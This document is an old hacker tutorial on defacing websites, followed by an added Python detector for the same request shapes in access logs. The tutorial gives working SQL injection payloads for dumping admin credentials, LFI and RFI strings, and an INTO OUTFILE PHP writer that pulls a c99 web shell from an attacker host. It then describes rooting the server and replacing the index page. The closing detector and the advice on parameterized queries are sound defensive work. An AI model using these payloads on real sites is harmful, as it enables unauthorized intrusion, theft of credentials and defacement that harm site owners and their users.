This one is an old tutorial written by me. Modified it a bit..
PS: You may think this document is small, but it's just that easy!!
There are many ways to deface websites, like:
Keylogging the webmaster of a website you want to hack. Not an easy way!
You can try LFI (Local File Inclusion, script.php?page=../../../../etc/passwd%00 for example)
Web-based applications, you can use exploit-db.com for checking vulnerabilities
Also RFI (Remote File Inclusion, script.php?page=http://www.evil.com/shell.txt?)
XSS Cookie Grabbing and ClickJacking.
But I will describe how to deface a website which is vulnerable to SQL Injection by uploading a shell.
Let's check out the simple way!
1. Find out the column and table name:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database()--
script.php?id=-1 union all select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database()--
OK, probably there is a table named admin_users, and 2 columns named admin_name & admin_pass.
Let's get the data from it:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(admin_name,0x3a,admin_pass),7,8,9,10 from admin_users--
If it's a hash (32 characters), Google md5 crack, and check some websites to crack the hash!
2. Log into the admin panel.
3. Try to find something where you can upload things, like albums or something.
Because album/image are 9/10 times writeable!
4. Upload a shell.php (not .txt; use .txt when you do RFI (Remote File Inclusion), for example).
Now go to your uploaded shell, site.com/c99.php, and if it's possible, root it! (check some available exploits at exploit-db.com)
5. Change the index.html/php/asp or w/e, if it's writeable, to your own choice!
How to deface via SQL injection when magic_quotes are on and you find out the path of the server (ex. /home/www/site.com/public_html):
1. Use the infected column number, for example 7 :
site.com/script.php?id=-1 union all select 1,2,3,4,5,6,"<?php fwrite(fopen($_GET,'w'), file_get_contents($_GET)); ?>",8,9,10 INTO OUTFILE '/home/www/site.com/public_html/images/shell.php'--
Use /images/ because this dir is almost always writeable.
2. Now you can give parameters to shell.php, like:
http://www.site.com/images/shell.php?o=c99.php&i=http://www.EVILSITE.COM/shells/c99.txt
This creates a file named c99.php with the content of
http://www.EVILSITE.COM/shells/c99.txt.
3. Guess !! Yes!!!! you can access your shell now via
http://www.site.com/images/c99.php
Now go to your uploaded shell, site.com/images/c99.php, and if it's possible, root it! (check some available exploits at exploit-db.com)
By ©Darkc0ke
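
From the defender's side, every request shape in this tutorial (UNION SELECT enumeration of information_schema, INTO OUTFILE, traversal with a null byte, a URL passed as an include parameter, a script served from an upload directory) leaves a recognizable line in the web server access log. The following detector is an added example, not part of the original tutorial; the log lines are constructed, and the rule labels and upload directory names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Rule labels are hypothetical names; each regex matches a request shape from the tutorial.
RULES = [
    ("sqli_union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("sqli_schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("sqli_file_write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("lfi_traversal", re.compile(r"(\.\./){2,}|\x00")),
    # Noisy on sites with legitimate redirect parameters; tune per application.
    ("rfi_remote_include", re.compile(r"[?&][^=&]+=(https?|ftp)://", re.I)),
    # Assumed upload directories: nothing executable should ever be served from them.
    ("script_in_upload_dir", re.compile(
        r"^/(images|uploads|albums)/[^?]*\.(php\d?|phtml|asp|aspx)(\?|$)", re.I)),
]
LOG_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the labels of all rules that match a request target."""
    decoded = target
    for _ in range(3):  # undo up to three layers of URL encoding
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return [label for label, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Map 1-based line numbers of suspicious log lines to their rule labels."""
    hits = {}
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.search(line)
        labels = classify(m.group(1)) if m else []
        if labels:
            hits[n] = labels
    return hits

P = '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '  # constructed log prefix
SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    P + '"GET /script.php?id=7 HTTP/1.1" 200 512',
    P + '"GET /script.php?id=-1%20union%20all%20select%201,2,group_concat(table_name)'
        '%20from%20information_schema.tables-- HTTP/1.1" 200 900',
    P + '"GET /script.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 300',
    P + '"GET /script.php?page=http://example.invalid/x.txt? HTTP/1.1" 200 300',
    P + '"GET /script.php?id=-1+union+select+1,2+into+outfile+%27/var/www/images/x.php%27--'
        ' HTTP/1.1" 200 0',
    P + '"GET /images/x.php?o=a&i=b HTTP/1.1" 200 10',
    P + '"GET /images/logo.png HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for line_no, labels in scan(SAMPLE_LOG).items():
        print(line_no, labels)
```

Matches are triage signals, not proof of compromise. The durable fixes are parameterized queries, a database account without the FILE privilege, and a web server configuration that refuses to execute scripts from upload directories.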